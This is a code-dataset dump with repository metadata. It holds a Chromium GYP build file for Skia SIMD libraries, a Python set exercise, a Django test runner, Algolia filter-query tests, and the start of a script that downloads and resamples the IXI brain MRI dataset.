'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
# without this option.
# See #86592.
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# The assembly uses the frame pointer register (r7 in Thumb/r11 in
# ARM), the compiler doesn't like that. Explicitly remove the
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| 39.517361
| 103
| 0.549864
|
{
'targets': [
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| true
| true
|
f71907adad9d2ae1000384e3083a6e18b87ab471
| 98
|
py
|
Python
|
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | 2
|
2020-10-23T10:55:58.000Z
|
2020-11-24T04:26:23.000Z
|
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | null | null | null |
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | 2
|
2020-11-19T06:37:29.000Z
|
2022-01-18T14:36:46.000Z
|
set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li)
| 19.6
| 34
| 0.653061
|
set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li)
| true
| true
|
f71908625209dd39e30f636c7b0dfff45f945d88
| 2,104
|
py
|
Python
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 62
|
2015-01-20T22:21:09.000Z
|
2019-11-25T12:57:53.000Z
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 24
|
2015-01-07T00:03:10.000Z
|
2021-06-10T17:34:35.000Z
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 19
|
2015-01-12T18:08:29.000Z
|
2020-08-10T17:16:31.000Z
|
#!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
# Fix for Django 1.9:
# https://github.com/tomchristie/django-rest-framework/issues/3494
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| 26.632911
| 79
| 0.626901
|
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| true
| true
|
f71908676eab5124d188403862efaa148addfb00
| 3,684
|
py
|
Python
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | 4
|
2020-08-28T19:22:02.000Z
|
2020-09-04T21:12:43.000Z
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | 3
|
2020-08-31T16:05:47.000Z
|
2020-09-11T16:31:24.000Z
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | null | null | null |
from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| 26.695652
| 97
| 0.575461
|
from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| true
| true
|
f7190a9265422f741faef15c4be15a7052a9510b
| 7,314
|
py
|
Python
|
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | null | null | null |
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | null | null | null |
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | 1
|
2021-04-29T03:01:53.000Z
|
2021-04-29T03:01:53.000Z
|
# -*- coding: utf-8 -*-
"""Download and extract the IXI Hammersmith Hospital 3T dataset
url: http://brain-development.org/ixi-dataset/
ref: IXI – Information eXtraction from Images (EPSRC GR/S21533/02)
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases # py 2/3 compatability
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
# Download all IXI data
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
# Extract the HH subset of IXI
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
# Process the demographic xls data and save to csv
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
